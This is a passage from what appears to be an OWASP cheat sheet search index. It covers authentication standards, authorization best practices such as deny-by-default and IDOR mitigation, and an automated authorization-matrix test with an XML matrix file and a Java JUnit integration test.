UAF takes advantage of existing security technologies present on devices for authentication, including fingerprint sensors, cameras (face biometrics), microphones (voice biometrics), Trusted Execution Environments (TEEs), Secure Elements (SEs) and others. The protocol is designed to plug these device capabilities into a common authentication framework. UAF works with both native applications and web applications.

U2F augments password-based authentication using a hardware token (typically USB) that stores cryptographic authentication keys and uses them for signing. The user can use the same token as a second factor for multiple applications. U2F works with web applications. It provides protection against phishing by using the URL of the website to look up the stored authentication key.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-managers","title":"Password Managers","text":"

Password managers are programs, browser plugins or web services that automate management of a large number of different credentials. Most password managers have functionality to allow users to easily use them on websites, either by pasting the passwords into the login form, or by simulating the user typing them in.

Web applications should not make password managers' job more difficult than necessary; they should observe the following recommendations:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html","title":"Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorization may be defined as \"the process of verifying that a requested action or service is approved for a specific entity\" (NIST). Authorization is distinct from authentication, which is the process of verifying an entity's identity. When designing and developing a software solution, it is important to keep these distinctions in mind. A user who has been authenticated (perhaps by providing a username and password) is often not authorized to access every resource and perform every action that is technically possible through a system. For example, a web app may have both regular users and admins, with the admins being able to perform actions the average user is not privileged to do, even though they have been authenticated. Additionally, authentication is not always required for accessing resources; an unauthenticated user may be authorized to access certain public resources, such as an image or login page, or even an entire web app.

The objective of this cheat sheet is to assist developers in implementing authorization logic that is robust, appropriate to the app's business context, maintainable, and scalable. The guidance provided in this cheat sheet should be applicable to all phases of the development lifecycle and flexible enough to meet the needs of diverse development environments.

Flaws related to authorization logic are a notable concern for web apps. Broken Access Control was ranked as the most concerning web security vulnerability in OWASP's 2021 Top 10 and asserted to have a \"High\" likelihood of exploit by MITRE's CWE program. Furthermore, according to Veracode's State of Software Vol. 10, Access Control was among the more common of OWASP's Top 10 risks to be involved in exploits and security incidents despite being among the least prevalent of those examined.

The potential impact resulting from exploitation of authorization flaws is highly variable, both in form and severity. Attackers may be able to read, create, modify, or delete resources that were meant to be protected (thus jeopardizing their confidentiality, integrity, and/or availability); however, the actual impact of such actions is necessarily linked to the criticality and sensitivity of the compromised resources. Thus, the business cost of a successfully exploited authorization flaw can range from very low to extremely high.

Both entirely unauthenticated outsiders and authenticated (but not necessarily authorized) users can take advantage of authorization weaknesses. Although honest mistakes or carelessness on the part of non-malicious entities may enable authorization bypasses, malicious intent is typically required for access control threats to be fully realized. Horizontal privilege elevation (i.e. being able to access another user's resources) is an especially common weakness that an authenticated user may be able to take advantage of. Faults related to authorization control can allow malicious insiders and outsiders alike to view, modify, or delete sensitive resources of all forms (database records, static files, personally identifiable information (PII), etc.) or perform actions, such as creating a new account or initiating a costly order, that they should not be privileged to do. Furthermore, if logging related to access control is not properly set up, such authorization violations may go undetected or at least remain unattributable to a particular individual or group.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#recommendations","title":"Recommendations","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-least-privileges","title":"Enforce Least Privileges","text":"

As a security concept, Least Privileges refers to the principle of assigning users only the minimum privileges necessary to complete their job. Although perhaps most commonly applied in system administration, this principle has relevance to the software developer as well. Least Privileges must be applied both horizontally and vertically. For example, even though both an accountant and sales representative may occupy the same level in an organization's hierarchy, both require access to different resources to perform their jobs. The accountant should likely not be granted access to a customer database and the sales representative should not be able to access payroll data. Similarly, the head of the sales department is likely to need more privileged access than their subordinates.

Failure to enforce least privileges in an application can jeopardize the confidentiality of sensitive resources. Mitigation strategies are applied primarily during the Architecture and Design phase (see CWE-272); however, the principle must be addressed throughout the SDLC.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#deny-by-default","title":"Deny by Default","text":"

Even when no access control rules are explicitly matched, the application cannot remain neutral when an entity is requesting access to a particular resource. The application must always make a decision, whether implicitly or explicitly, to either deny or permit the requested access. Logic errors and other mistakes relating to access control may happen, especially when access requirements are complex; consequently, one should not rely entirely on explicitly defined rules for matching all possible requests. For security purposes an application should be configured to deny access by default.
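
A deny-by-default check can be reduced to: permit only what an explicit rule allows, and deny everything else. A minimal sketch with an invented rule table:

# Illustrative policy table: (role, action, resource) tuples that are allowed.
ALLOW_RULES = {
    ("admin", "delete", "invoice"),
    ("accountant", "read", "invoice"),
}

def is_authorized(role: str, action: str, resource: str) -> bool:
    """Permit only what an explicit rule allows; everything else is denied."""
    return (role, action, resource) in ALLOW_RULES

assert is_authorized("accountant", "read", "invoice")
assert not is_authorized("accountant", "delete", "invoice")  # no rule -> denied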

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#validate-the-permissions-on-every-request","title":"Validate the Permissions on Every Request","text":"

Permission should be validated correctly on every request, regardless of whether the request was initiated by an AJAX script, server-side, or any other source. The technology used to perform such checks should allow for global, application-wide configuration rather than needing to be applied individually to every method or class. Remember an attacker only needs to find one way in. Even if just a single access control check is \"missed\", the confidentiality and/or integrity of a resource can be jeopardized. Validating permissions correctly on just the majority of requests is insufficient. Specific technologies that can help developers in performing such consistent permission checks include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#thoroughly-review-the-authorization-logic-of-chosen-tools-and-technologies-implementing-custom-logic-if-necessary","title":"Thoroughly Review the Authorization Logic of Chosen Tools and Technologies, Implementing Custom Logic if Necessary","text":"

Today's developers have access to a vast amount of libraries, platforms, and frameworks that allow them to incorporate robust, complex logic into their apps with minimal effort. However, these frameworks and libraries must not be viewed as a quick panacea for all development problems; developers have a duty to use such frameworks responsibly and wisely. Two general concerns relevant to framework/library selection as it relates to proper access control are misconfiguration/lack of configuration on the part of the developer and vulnerabilities within the components themselves (see A6 and A9 for general guidance on these topics).

Even in an otherwise securely developed application, vulnerabilities in third-party components can allow an attacker to bypass normal authorization controls. Such concerns need not be restricted to unproven or poorly maintained projects, but affect even the most robust and popular libraries and frameworks. Writing complex, secure software is hard. Even the most competent developers, working on high-quality libraries and frameworks, will make mistakes. Assume any third-party component you incorporate into an application could be or become subject to an authorization vulnerability. Important considerations include:

Misconfiguration (or complete lack of configuration) is another major area in which the components developers build upon can lead to broken authorization. These components are typically intended to be relatively general purpose tools made to appeal to a wide audience. For all but the simplest use cases, these frameworks and libraries must be customized or supplemented with additional logic in order to meet the unique requirements of a particular app or environment. This consideration is especially important when security requirements, including authorization, are concerned. Notable configuration considerations for authorization include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#prefer-attribute-and-relationship-based-access-control-over-rbac","title":"Prefer Attribute and Relationship Based Access Control over RBAC","text":"

In software engineering, two basic forms of access control are widely utilized: Role-Based Access Control (RBAC) and Attribute-Based Access Control (ABAC). There is a third, more recent, model which has gained popularity: Relationship-Based Access Control (ReBAC). The decision between the models has significant implications for the entire SDLC and should be made as early as possible.

Although RBAC has a long history and remains popular among software developers today, ABAC and ReBAC should typically be preferred for application development. Their advantages over RBAC include:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#ensure-lookup-ids-are-not-accessible-even-when-guessed-or-cannot-be-tampered-with","title":"Ensure Lookup IDs are Not Accessible Even When Guessed or Cannot Be Tampered With","text":"

Applications often expose the internal object identifiers (such as an account number or Primary Key in a database) that are used to locate and reference an object. This ID may be exposed as a query parameter, path variable, \"hidden\" form field or elsewhere. For example:

https://mybank.com/accountTransactions?acct_id=901

Based on this URL, one could reasonably assume that the application will return a listing of transactions and that the transactions returned will be restricted to a particular account - the account indicated in the acct_id param. But what would happen if the user changed the value of the acct_id param to another value such as 523? Will the user be able to view transactions associated with another account even if it does not belong to them? If not, will the failure simply be the result of the account \"523\" not existing/not being found, or will it be due to a failed access control check? Although this example may be an oversimplification, it illustrates a very common security flaw in application development - CWE 639: Authorization Bypass Through User-Controlled Key. When exploited, this weakness can result in authorization bypasses, horizontal privilege escalation and, less commonly, vertical privilege escalation (see CWE-639). This type of vulnerability also represents a form of Insecure Direct Object Reference (IDOR). The following paragraphs will describe the weakness and possible mitigations.

In the example above, the lookup ID was not only exposed to the user and readily tampered with, but also appears to have been a fairly predictable, perhaps sequential, value. While one can use various techniques to mask or randomize these IDs and make them hard to guess, such an approach is generally not sufficient by itself. A user should not be able to access a resource they do not have permission for simply because they are able to guess and manipulate that object's identifier in a query param or elsewhere. Rather than relying on some form of security through obscurity, the focus should be on controlling access to the underlying objects and/or the identifiers themselves. Recommended mitigations for this weakness include the following:
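For instance, a common mitigation - authorizing against the object itself rather than relying on the opacity of its identifier - might look like the hypothetical sketch below for the banking example above. The in-memory maps stand in for whatever persistence layer the real application uses, and Java 16+ records are used only for brevity.

import java.util.List;
import java.util.Map;

// Minimal, hypothetical sketch: the in-memory maps stand in for whatever repositories
// or data access layer the real application uses.
class AccountTransactionService {

    record Account(long id, String ownerId) { }

    record Transaction(long accountId, String description) { }

    static class ResourceNotFoundException extends RuntimeException { }

    private final Map<Long, Account> accountsById;
    private final Map<Long, List<Transaction>> transactionsByAccountId;

    AccountTransactionService(Map<Long, Account> accountsById,
                              Map<Long, List<Transaction>> transactionsByAccountId) {
        this.accountsById = accountsById;
        this.transactionsByAccountId = transactionsByAccountId;
    }

    List<Transaction> getTransactions(String authenticatedUserId, long acctId) {
        Account account = accountsById.get(acctId);
        // Authorize against the object itself, not the guessability of its identifier.
        // An account that exists but belongs to someone else is reported exactly like a
        // missing account, so the response does not reveal which identifiers are valid.
        if (account == null || !account.ownerId().equals(authenticatedUserId)) {
            throw new ResourceNotFoundException();
        }
        return transactionsByAccountId.getOrDefault(acctId, List.of());
    }
}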

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-authorization-checks-on-static-resources","title":"Enforce Authorization Checks on Static Resources","text":"

The importance of securing static resources is often overlooked or at least overshadowed by other security concerns. Although securing databases and similar data stores justly receives significant attention from security-conscious teams, static resources must also be appropriately secured. Unprotected static resources are certainly a problem for websites and web applications of all forms, but in recent years, poorly secured resources in cloud storage offerings (such as Amazon S3 buckets) have risen to prominence. When securing static resources, consider the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#verify-that-authorization-checks-are-performed-in-the-right-location","title":"Verify that Authorization Checks are Performed in the Right Location","text":"

Developers must never rely on client-side access control checks. While such checks may be permissible for improving the user experience, they should never be the decisive factor in granting or denying access to a resource; client-side logic is often easy to bypass. Access control checks must be performed server-side, at the gateway, or using a serverless function (see OWASP ASVS 4.0.3, V1.4.1 and V4.1.1).
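As a rough sketch of placing the check on the server, the hypothetical servlet filter below (assuming the Servlet 4.0 API, where Filter's init and destroy have default implementations) rejects requests to an administrative path unless an assumed session attribute marks the caller as an administrator. It illustrates where the decision is made, not a complete access control implementation.

import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Hypothetical sketch: the "isAdmin" session attribute stands in for however the
// application really resolves the caller's permissions on the server.
public class AdminAreaAuthorizationFilter implements Filter {

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        HttpSession session = request.getSession(false);
        boolean isAdmin = session != null && Boolean.TRUE.equals(session.getAttribute("isAdmin"));

        if (request.getRequestURI().startsWith("/admin") && !isAdmin) {
            // The decision is made on the server; any hiding of the admin UI on the
            // client is purely cosmetic and is not relied upon here.
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        chain.doFilter(req, res);
    }
}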

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#exit-safely-when-authorization-checks-fail","title":"Exit Safely when Authorization Checks Fail","text":"

Failed access control checks are a normal occurrence in a secured application; consequently, developers must plan for such failures and handle them securely. Improper handling of such failures can lead to the application being left in an unpredictable state (CWE-280: Improper Handling of Insufficient Permissions or Privileges). Specific recommendations include the following:
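One common pattern, sketched below under the assumption of a Spring MVC style application (the exception and advice classes are illustrative, not a prescribed design), is to translate every failed check into a single, centrally handled exception so the application always ends in a known, denied state.

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.ExceptionHandler;

// Hypothetical application-specific exception thrown by any failed authorization check.
class AccessDeniedByPolicyException extends RuntimeException {
    AccessDeniedByPolicyException(String message) {
        super(message);
    }
}

// Central handler: every failed check ends in the same, predictable denied state.
@ControllerAdvice
class AuthorizationFailureHandler {

    @ExceptionHandler(AccessDeniedByPolicyException.class)
    ResponseEntity<String> handleDenied(AccessDeniedByPolicyException ex) {
        // The response body is deliberately generic; the details belong in the server-side log.
        return ResponseEntity.status(HttpStatus.FORBIDDEN).body("Access denied");
    }
}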

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#implement-appropriate-logging","title":"Implement Appropriate Logging","text":"

Logging is one of the most important detective controls in application security; insufficient logging and monitoring is recognized as among the most critical security risks in OWASP's Top Ten 2021. Appropriate logs not only help detect malicious activity; they are also invaluable resources in post-incident investigations, can be used to troubleshoot access control and other security-related problems, and are useful in security auditing. Though easy to overlook during the initial design and requirements phase, logging is an important component of holistic application security and must be incorporated into all phases of the SDLC. Recommendations for logging include the following:
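As a minimal sketch of what an authorization decision log entry might capture (who, what, when, outcome), the example below uses SLF4J purely as an illustrative logging facade; the field names are assumptions rather than a prescribed schema.

import java.time.Instant;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

// Sketch of an authorization audit log entry; the field names are illustrative assumptions.
class AuthorizationAuditLogger {

    private static final Logger LOG = LoggerFactory.getLogger(AuthorizationAuditLogger.class);

    // Record the decision with enough context to investigate later, but keep secrets and
    // other sensitive data out of the message itself.
    void logDecision(String userId, String action, String resource, boolean granted) {
        LOG.info("authz decision user={} action={} resource={} granted={} at={}",
                userId, action, resource, granted, Instant.now());
    }
}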

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#create-unit-and-integration-test-cases-for-authorization-logic","title":"Create Unit and Integration Test Cases for Authorization Logic","text":"

Unit and integration testing are essential for verifying that an application performs as expected and consistently across changes. Flaws in access control logic can be subtle, particularly when requirements are complex; however, even a small logical or configuration error in access control can result in severe consequences. Although not a substitute for a dedicated security test or penetration test (see OWASP WSTG 4.5 for an excellent guide on this topic as it relates to access control), automated unit and integration testing of access control logic can help reduce the number of security flaws that make it into production. These tests are good at catching the \"low-hanging fruit\" of security issues but not more sophisticated attack vectors (OWASP SAMM: Security Testing).

Unit and integration testing should aim to incorporate many of the concepts explored in this document. For example, is access being denied by default? Does the application terminate safely when an access control check fails, even under abnormal conditions? Are ABAC policies being properly enforced? While simple unit and integration tests can never replace manual testing performed by a skilled hacker, they are an important tool for detecting and correcting security issues quickly and with far fewer resources than manual testing.
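A deny-by-default check can be expressed as an ordinary JUnit test, as in the hypothetical sketch below; the inline policy is a stand-in for the application's real access control logic.

import org.junit.Assert;
import org.junit.Test;

// Hypothetical deny-by-default test; the inline policy is a stand-in for the
// application's real access control logic.
public class DenyByDefaultPolicyTest {

    // Illustrative policy: access is granted only for an explicitly allowed combination;
    // everything else falls through to "deny".
    private boolean isAllowed(String role, String action) {
        if ("ADMIN".equals(role) && "DeleteMessage".equals(action)) {
            return true;
        }
        return false;
    }

    @Test
    public void accessIsDeniedByDefault() {
        Assert.assertFalse(isAllowed("ANONYMOUS", "DeleteMessage"));
        Assert.assertFalse(isAllowed(null, "DeleteMessage"));
        Assert.assertFalse(isAllowed("ADMIN", "UnknownService"));
    }
}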

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#abac","title":"ABAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rbac","title":"RBAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rebac","title":"ReBAC","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html","title":"Authorization Testing Automation Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Defining and implementing authorizations is one of the important protection measures of an application. Authorizations are defined during the creation phase of the project, and even if authorization issues are found when the application is initially released and submitted to a security audit before going live, the largest number of authorization-related issues arises during the maintenance lifetime of the application.

This situation is often explained by the fact that features are added or modified and no review of the authorizations is performed on the application before the new release is published, for cost or time reasons.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#context","title":"Context","text":"

In order to address this situation, it can be useful to automate the evaluation of the authorization definition and implementation in the application. This constantly ensures that the implementation of the authorizations in the application is consistent with the authorization definition.

An authorization is often composed of two elements (also named dimensions): the Feature, and the Logical Role that can access it (sometimes a third dimension named Data is added in order to define access that includes filtering at the business data level).

The representation of the different combinations of these two dimensions is often named an Authorization matrix and is often formalized in a spreadsheet.

During a test of an authorization, a Logical Role is also called a Point Of View.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#objective","title":"Objective","text":"

This article describes a proposed implementation for automating the tests of an authorization matrix.

This article assumes that two dimensions are used to represent an authorization for the technical proposition described, and it takes an application exposing REST services as an example.

The objective is to provide starting ideas and hints for creating a tailored way of testing the authorization matrix of the target application.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#proposition","title":"Proposition","text":"

In order to achieve the full automation of the evaluation of the authorization matrix, the following actions have been performed:

  1. Formalize the authorization matrix in a pivot format file allowing:

    1. Easy processing by a program.
    2. Reading and updating by a human, for the follow-up of the authorization combinations.
    3. A hierarchy in the information, in order to easily materialize the different combinations.
    4. The maximum possible independence from the technology and design used to implement the application exposing the features.
  2. Create a set of integration tests that fully use the authorization matrix pivot file as their input source in order to evaluate the different combinations with:

    1. The minimum possible maintenance when the authorization matrix pivot file is updated.
    2. A clear indication, in case of a failed test, of the source authorization combination that does not respect the authorization matrix.
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#authorization-matrix-pivot-file","title":"Authorization matrix pivot file","text":"

The XML format has been used to formalize the authorization matrix.

The XML structure contains 3 main sections:

This is an example of the XML used to represent the authorization:

Placeholders (values between {}) are used to mark locations where a test value must be placed by the integration tests if needed.

  <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n      This file materializes the authorization matrix for the different\n      services exposed by the system.\n\n      It will be used by the tests as a input source for the different tests cases:\n      1) Evaluate legitimate access and its correct implementation\n      2) Identify not legitimate access (authorization definition issue\n      on service implementation)\n\n      The \"name\" attribute is used to uniquely identify a SERVICE or a ROLE.\n  -->\n<authorization-matrix>\n\n<!-- Describe the possible logical roles used in the system, is used here to\n      provide a list+explanation\n      of the different roles (authorization level) -->\n<roles>\n<role name=\"ANONYMOUS\"\ndescription=\"Indicate that no authorization is needed\"/>\n<role name=\"BASIC\"\ndescription=\"Role affecting a standard user (lowest access right just above anonymous)\"/>\n<role name=\"ADMIN\"\ndescription=\"Role affecting an administrator user (highest access right)\"/>\n</roles>\n\n<!-- List and describe the available services exposed by the system and the associated\n      logical role(s) that can call them -->\n<services>\n<service name=\"ReadSingleMessage\" uri=\"/{messageId}\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"ReadAllMessages\" uri=\"/\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"CreateMessage\" uri=\"/\" http-method=\"PUT\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"DeleteMessage\" uri=\"/{messageId}\" http-method=\"DELETE\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ADMIN\"/>\n</service>\n</services>\n\n<!-- Provide a test payload for each service if needed -->\n<services-testing>\n<service name=\"ReadSingleMessage\">\n<payload/>\n</service>\n<service name=\"ReadAllMessages\">\n<payload/>\n</service>\n<service name=\"CreateMessage\">\n<payload content-type=\"application/json\">\n{\"content\":\"test\"}\n              </payload>\n</service>\n<service name=\"DeleteMessage\">\n<payload/>\n</service>\n</services-testing>\n\n</authorization-matrix>\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#integration-tests","title":"Integration tests","text":"

Integration tests are implemented with as much factorized (shared) code as possible, and one test case per Point Of View (POV) is created in order to group the verifications by access-level profile (logical role) and make errors easier to render and identify.

Parsing, object mapping and access to the authorization matrix information are implemented using the built-in XML marshalling/unmarshalling features of the technology used to implement the tests (JAXB here), in order to limit the custom code to the part in charge of performing the tests.

This is the implementation of the integration test case class:

  import org.owasp.pocauthztesting.enumeration.SecurityRole;\nimport org.owasp.pocauthztesting.service.AuthService;\nimport org.owasp.pocauthztesting.vo.AuthorizationMatrix;\nimport org.apache.http.client.methods.CloseableHttpResponse;\nimport org.apache.http.client.methods.HttpDelete;\nimport org.apache.http.client.methods.HttpGet;\nimport org.apache.http.client.methods.HttpPut;\nimport org.apache.http.client.methods.HttpRequestBase;\nimport org.apache.http.entity.StringEntity;\nimport org.apache.http.impl.client.CloseableHttpClient;\nimport org.apache.http.impl.client.HttpClients;\nimport org.junit.Assert;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\nimport org.xml.sax.InputSource;\nimport javax.xml.bind.JAXBContext;\nimport javax.xml.parsers.SAXParserFactory;\nimport javax.xml.transform.Source;\nimport javax.xml.transform.sax.SAXSource;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.Optional;\n\n/**\n   * Integration Test cases in charge of validate the correct implementation of the authorization matrix.\n   * Create on test case by logical role that will test access on all services exposed by the system.\n   * Implements here focus on readability\n   */\npublic class AuthorizationMatrixIT {\n\n/**\n       * Object representation of the authorization matrix\n       */\nprivate static AuthorizationMatrix AUTHZ_MATRIX;\n\nprivate static final String BASE_URL = \"http://localhost:8080\";\n\n\n/**\n       * Load the authorization matrix in objects tree\n       *\n       * @throws Exception If any error occurs\n       */\n@BeforeClass\npublic static void globalInit() throws Exception {\ntry (FileInputStream fis = new FileInputStream(new File(\"authorization-matrix.xml\"))) {\nSAXParserFactory spf = SAXParserFactory.newInstance();\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(fis));\nJAXBContext jc = JAXBContext.newInstance(AuthorizationMatrix.class);\nAUTHZ_MATRIX = (AuthorizationMatrix) jc.createUnmarshaller().unmarshal(xmlSource);\n}\n}\n\n/**\n       * Test access to the services from a anonymous user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAnonymousUserPointOfView() throws Exception {\n//Run the tests - No access token here\nList<String> errors = executeTestWithPointOfView(SecurityRole.ANONYMOUS, null);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ANONYMOUS USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a basic user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingBasicUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"basic\", SecurityRole.BASIC);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.BASIC, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the BASIC USER point of view:\\n \" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a administrator user.\n       *\n   
    * @throws Exception\n       */\n@Test\npublic void testAccessUsingAdministratorUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"admin\", SecurityRole.ADMIN);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.ADMIN, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ADMIN USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Evaluate the access to all service using the point of view (POV) specified.\n       *\n       * @param pointOfView Point of view to use\n       * @param accessToken Access token that is linked to the point of view in terms of authorization.\n       * @return List of errors detected\n       * @throws Exception If any error occurs\n       */\nprivate List<String> executeTestWithPointOfView(SecurityRole pointOfView, String accessToken) throws Exception {\nList<String> errors = new ArrayList<>();\nString errorMessageTplForUnexpectedReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one in allowed or denied case.\";\nString errorMessageTplForIncorrectReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one (%s expected).\";\nString fatalErrorMessageTpl = \"The service '%s' when called with POV %s meet the error: %s\";\n\n//Get the list of services to call\nList<AuthorizationMatrix.Services.Service> services = AUTHZ_MATRIX.getServices().getService();\n\n//Get the list of services test payload to use\nList<AuthorizationMatrix.ServicesTesting.Service> servicesTestPayload = AUTHZ_MATRIX.getServicesTesting().getService();\n\n//Call all services sequentially (no special focus on performance here)\nservices.forEach(service -> {\n//Get the service test payload for the current service\nString payload = null;\nString payloadContentType = null;\nOptional<AuthorizationMatrix.ServicesTesting.Service> serviceTesting = servicesTestPayload.stream().filter(srvPld -> srvPld.getName().equals(service.getName())).findFirst();\nif (serviceTesting.isPresent()) {\npayload = serviceTesting.get().getPayload().getValue();\npayloadContentType = serviceTesting.get().getPayload().getContentType();\n}\n//Call the service and verify if the response is consistent\ntry {\n//Call the service\nint serviceResponseCode = callService(service.getUri(), payload, payloadContentType, service.getHttpMethod(), accessToken);\n//Check if the role represented by the specified point of view is defined for the current service\nOptional<AuthorizationMatrix.Services.Service.Role> role = service.getRole().stream().filter(r -> r.getName().equals(pointOfView.name())).findFirst();\nboolean accessIsGrantedInAuthorizationMatrix = role.isPresent();\n//Verify behavior consistency according to the response code returned and the authorization configured in the matrix\nif (serviceResponseCode == service.getHttpResponseCodeForAccessAllowed()) {\n//Roles is not in the list of role allowed to access to the service so it's an error\nif (!accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessDenied()));\n}\n} else if (serviceResponseCode == service.getHttpResponseCodeForAccessDenied()) {\n//Roles is in the list of role allowed to access to the 
service so it's an error\nif (accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessAllowed()));\n}\n} else {\nerrors.add(String.format(errorMessageTplForUnexpectedReturnCode, service.getName(), pointOfView.name(), serviceResponseCode));\n}\n} catch (Exception e) {\nerrors.add(String.format(fatalErrorMessageTpl, service.getName(), pointOfView.name(), e.getMessage()));\n}\n\n\n});\n\nreturn errors;\n}\n\n/**\n       * Call a service with a specific payload and return the HTTP response code received.\n       * Delegate this step in order to made the test cases more easy to maintain.\n       *\n       * @param uri                URI of the target service\n       * @param payloadContentType Content type of the payload to send\n       * @param payload            Payload to send\n       * @param httpMethod         HTTP method to use\n       * @param accessToken        Access token to specify to represent the identity of the caller\n       * @return The HTTP response code received\n       * @throws Exception If any error occurs\n       */\nprivate int callService(String uri, String payload, String payloadContentType, String httpMethod, String accessToken) throws Exception {\nint rc;\n\n//Build the request - Use Apache HTTP Client in order to be more flexible in the combination\nHttpRequestBase request;\nString url = (BASE_URL + uri).replaceAll(\"\\\\{messageId\\\\}\", \"1\");\nswitch (httpMethod) {\ncase \"GET\":\nrequest = new HttpGet(url);\nbreak;\ncase \"DELETE\":\nrequest = new HttpDelete(url);\nbreak;\ncase \"PUT\":\nrequest = new HttpPut(url);\nif (payload != null) {\nrequest.setHeader(\"Content-Type\", payloadContentType);\n((HttpPut) request).setEntity(new StringEntity(payload.trim()));\n}\nbreak;\ndefault:\nthrow new UnsupportedOperationException(httpMethod + \" not supported !\");\n}\nrequest.setHeader(\"Authorization\", (accessToken != null) ? accessToken : \"\");\n\n\n//Send the request and get the HTTP response code\ntry (CloseableHttpClient httpClient = HttpClients.createDefault()) {\ntry (CloseableHttpResponse httpResponse = httpClient.execute(request)) {\n//Don't care here about the response content...\nrc = httpResponse.getStatusLine().getStatusCode();\n}\n}\n\nreturn rc;\n}\n\n/**\n       * Generate a JWT token the user and role specified.\n       *\n       * @param login User login\n       * @param role  Authorization logical role\n       * @return The JWT token\n       * @throws Exception If any error occurs during the creation\n       */\nprivate String generateTestCaseAccessToken(String login, SecurityRole role) throws Exception {\nreturn new AuthService().issueAccessToken(login, role);\n}\n\n\n/**\n       * Format a list of errors to a printable string\n       *\n       * @param errors Error list\n       * @return Printable string\n       */\nprivate String formatErrorsList(List<String> errors) {\nStringBuilder buffer = new StringBuilder();\nerrors.forEach(e -> buffer.append(e).append(\"\\n\"));\nreturn buffer.toString();\n}\n}\n

If one or more authorization issues are detected, the output is the following:

